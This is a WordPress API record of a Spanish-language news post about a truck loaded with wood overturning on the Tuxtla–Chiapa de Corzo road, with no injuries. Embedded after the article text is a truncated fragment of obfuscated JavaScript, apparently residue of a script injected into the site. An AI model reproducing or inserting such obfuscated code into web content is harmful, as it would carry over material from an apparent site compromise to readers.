{"id":9501,"date":"2023-04-12T01:48:39","date_gmt":"2023-04-12T01:48:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9501"},"modified":"2023-04-12T01:48:39","modified_gmt":"2023-04-12T01:48:39","slug":"vuelca-camion-en-el-tramo-chiapa-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9501","title":{"rendered":"Vuelca cami\u00f3n en el tramo Chiapa-Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681263992886.jpg\" alt=\"\" class=\"wp-image-9502\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681263992886.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681263992886-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>11 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana se registr\u00f3 una volcadura en el tramo Tuxtla-Chiapa de Corzo, dejando cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, fue un cami\u00f3n de tres toneladas de color rojo, con redila e iba cargado de madera.<\/p>\n\n\n\n<p>Los testigos relataron que, la unidad circulaba a de Oriente a Poniente, y de manera repentina present\u00f3 una falla mec\u00e1nica en la direcci\u00f3n.<\/p>\n\n\n\n<p>Por este motivo perdi\u00f3 el control de la unidad, y termin\u00f3 chocando contra las jardineras y finalmente volc\u00f3.<\/p>\n\n\n\n<p>Afortunadamente no hubo heridos.<\/p>\n\n\n\n<p>Al quedar la unidad volcada se interrumpi\u00f3 el tr\u00e1fico veh\u00edcular y la madera regada en la zona.<\/p>\n\n\n\n<p>Fueron los agentes de la Guardia Nacional los que se hicieron cargo y solicitaron una gr\u00faa para ser trasladada a un corral\u00f3n en turno y deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. 11 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana se registr\u00f3 una volcadura en el tramo Tuxtla-Chiapa de Corzo, dejando cuantiosos da\u00f1os materiales. Los reportes oficiales informaron que, fue un cami\u00f3n de tres toneladas de color rojo, con redila e iba cargado de madera. Los testigos relataron que, la unidad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9502,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9501","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9501"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9501\/revisions"}],"predecessor-version":[{"id":9503,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9501\/revisions\/9503"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9502"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}